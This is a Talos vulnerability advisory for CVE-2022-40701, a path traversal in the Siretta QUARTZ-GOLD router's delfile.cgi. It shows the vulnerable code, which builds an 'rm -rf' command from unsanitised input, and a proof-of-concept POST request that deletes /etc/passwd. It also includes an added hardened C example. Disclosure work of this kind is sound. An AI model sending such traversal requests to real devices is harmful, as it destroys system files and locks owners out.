# Talos Vulnerability Report
### TALOS-2022-1606
## Siretta QUARTZ-GOLD httpd delfile.cgi directory traversal vulnerability
##### January 26, 2023
##### CVE Number
CVE-2022-40701
##### SUMMARY
A directory traversal vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.
##### CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
##### PRODUCT URLS
QUARTZ-GOLD –
##### CVSSv3 SCORE
6.5 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
##### CWE
CWE-22 – Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
##### DETAILS
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as SSH, UPNP, VPN, SNMP and many others.
The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. The web server offers APIs for uploading files, downloading them, and deleting them when they are no longer required.
The following is the API for deleting a previously uploaded file:
```
void delfile.cgi(void)
{
    […]
    [… calculate the value of the base_folder variable …]
    _filename_param = (char *)webcgi_safeget("_filename");          // [1]
    filename_ = "";
    if (_filename_param != (char *)0x0) {
        filename_ = _filename_param;
    }
    if (*filename_ != '\0') {
        sprintf(command_buff,"rm -rf %s/%s",base_folder,filename_); // [2]
        system(command_buff);                                       // [3]
    }
    […]
}
```
`delfile.cgi` expects one parameter, `_filename`, which is the name of the file to be deleted. The parameter is fetched at `[1]` and used at `[2]`; between the fetch and the use there is no sanitization of its value. Then, at `[3]`, the string `rm -rf <base_folder>/<_filename>` is passed as the parameter of the `system` function. This functionality is vulnerable to a path traversal, allowing the deletion of arbitrary files in the file system.
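A hardened form of the delete step described above, given here as an added example (it is not Talos's code and not the vendor's patch). It assumes uploads are flat file names directly under the base folder; `safe_delete` and its parameter names are hypothetical.

```c
#define _XOPEN_SOURCE 700   /* for realpath() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical hardened delete step (not the vendor's fix).
 * Returns 0 if the file was removed, -1 if rejected or on error. */
int safe_delete(const char *base_folder, const char *filename)
{
    char joined[PATH_MAX], real_base[PATH_MAX], real_target[PATH_MAX];
    size_t n;
    int len;

    if (filename == NULL || *filename == '\0')
        return -1;
    /* Uploaded files are plain names: refuse separators and dot entries. */
    if (strchr(filename, '/') != NULL ||
        strcmp(filename, ".") == 0 || strcmp(filename, "..") == 0)
        return -1;

    if (realpath(base_folder, real_base) == NULL)
        return -1;
    len = snprintf(joined, sizeof joined, "%s/%s", real_base, filename);
    if (len < 0 || (size_t)len >= sizeof joined)
        return -1;

    /* Resolve symlinks, then require the result to stay under the base. */
    if (realpath(joined, real_target) == NULL)
        return -1;
    n = strlen(real_base);
    if (strncmp(real_target, real_base, n) != 0 || real_target[n] != '/')
        return -1;

    /* unlink() removes a single file: no shell, no recursion. */
    return unlink(real_target) == 0 ? 0 : -1;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <base_folder> <filename>\n", argv[0]);
        return 2;
    }
    return safe_delete(argv[1], argv[2]) == 0 ? 0 : 1;
}
```

The allow-list check on the name and the `realpath` containment check are independent layers: the first rejects `../` sequences outright, the second catches a symlink inside the upload folder that points elsewhere.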
### Exploit Proof of Concept
For example, sending the following request:
```
POST /delfile.cgi HTTP/1.1
Authorization: Basic
Content-Length: 55

_filename=../../etc/passwd&_http_id=
```
would prohibit access with SSH.
##### TIMELINE
2022-10-14 – Initial Vendor Contact
2022-10-20 – Vendor Disclosure
2022-11-24 – Vendor Patch Release
2023-01-26 – Public Release
##### Credit
Discovered by Francesco Benvenuto of Cisco Talos.